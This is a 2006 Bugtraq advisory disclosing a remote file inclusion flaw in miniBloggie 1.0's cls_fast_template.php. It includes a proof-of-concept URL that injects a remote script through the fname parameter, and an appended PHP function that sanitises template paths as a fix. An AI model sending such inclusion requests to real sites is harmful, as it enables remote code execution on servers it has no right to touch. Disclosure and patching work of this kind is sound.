Bugtraq mailing list archives
miniBloggie <= 1.0 (fname) Remote File Inclusion Vulnerability
From: sh3ll () sh3ll ir
Date: 10 Aug 2006 20:38:38 -0000
---------------------------------------------------------------------------------------
miniBloggie 1.0 fname Remote File Inclusion
---------------------------------------------------------------------------------------

Author   : Sh3ll
Date     : 2006/05/01
HomePage : http://www.sh3ll.ir
Contact  : sh3ll[at]sh3ll[dot]ir

---------------------------------------------------------------------------------------

Affected Software Description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : miniBloggie
version     : 1.0
Vendor      : http://www.mywebland.com
Class       : Remote File Inclusion
Risk        : High
Summary     : minibloggie, a mini blog script yet effective built using fast template
              for easy customisation. Using Mysql database system with edit, delete, ,
              support smiley & BBcode, administrator log in for easy website management.

---------------------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~

The Problem Exists in cls_fast_template.php, Where the Variable $fname Is Used in an
include() Function Without Being Declared.

---------------------------------cls_fast_template.php---------------------------------
....
<?php
else
{
    fclose($fp);
    include $fname;
    return;
}
...
---------------------------------------------------------------------------------------

PoC:
~~~

http://www.target.com/[miniBloggie]/cls_fast_template.php?fname=[Evil Script]

Solution:
~~~~~~~~

Sanitize Variable $fname in cls_fast_template.php

----------------------------------------------------------------------------------------

Note:
~~~~

Vendor Contacted, But No Response. So Do a Dirty Patch.

----------------------------------------------------------------------------------------

Shoutz:
~~~~~~

~ Special Greetz to My Best Friend N4sh3n4s & My GF Atena
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams
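One way to implement the "sanitize $fname" fix the advisory asks for, as an added example that is not miniBloggie's code or the advisory author's patch. The names safe_template_path(), TEMPLATE_DIR and TEMPLATE_EXTENSIONS, the template directory and the allowed extensions are all assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical settings (assumptions, not taken from miniBloggie).
const TEMPLATE_DIR = __DIR__ . '/templates';
const TEMPLATE_EXTENSIONS = ['tpl', 'html'];

/**
 * Resolve a template name to a real file inside $baseDir, or return null.
 * $fname arrives as an explicit parameter, so it is always declared and is
 * never populated from the request (the register_globals failure mode).
 */
function safe_template_path(string $fname, string $baseDir = TEMPLATE_DIR): ?string
{
    // Reject empty names, NUL bytes and any scheme prefix (http://, ftp://, php://, data:).
    if ($fname === '' || strpos($fname, "\0") !== false
        || preg_match('#^[a-z][a-z0-9+.\-]*:#i', $fname) === 1) {
        return null;
    }
    // Only known template extensions; a name ending in .php is refused.
    $ext = strtolower(pathinfo($fname, PATHINFO_EXTENSION));
    if (!in_array($ext, TEMPLATE_EXTENSIONS, true)) {
        return null;
    }
    // Canonicalise (resolves ../ and symlinks), then require the result to sit under the base.
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $fname);
    if ($base === false || $real === false) {
        return null;
    }
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return is_file($real) ? $real : null;
}

// Constructed demo: a temporary template directory and sample $fname values.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'tpl_demo_' . getmypid();
if (!is_dir($dir)) {
    mkdir($dir);
}
file_put_contents($dir . DIRECTORY_SEPARATOR . 'main.tpl', '<h1>{TITLE}</h1>');

foreach (['main.tpl', '../../etc/passwd', 'http://example.invalid/x.txt', 'main.php'] as $candidate) {
    $path = safe_template_path($candidate, $dir);
    echo str_pad($candidate, 32), $path === null ? 'rejected' : 'accepted', PHP_EOL;
}
unlink($dir . DIRECTORY_SEPARATOR . 'main.tpl');
rmdir($dir);
```

In the vulnerable branch, the validated path would replace the raw `$fname`, and a null result would be treated as an error instead of falling through to `include`. Disabling `register_globals` and remote URL includes in the PHP configuration removes the conditions the flaw depends on.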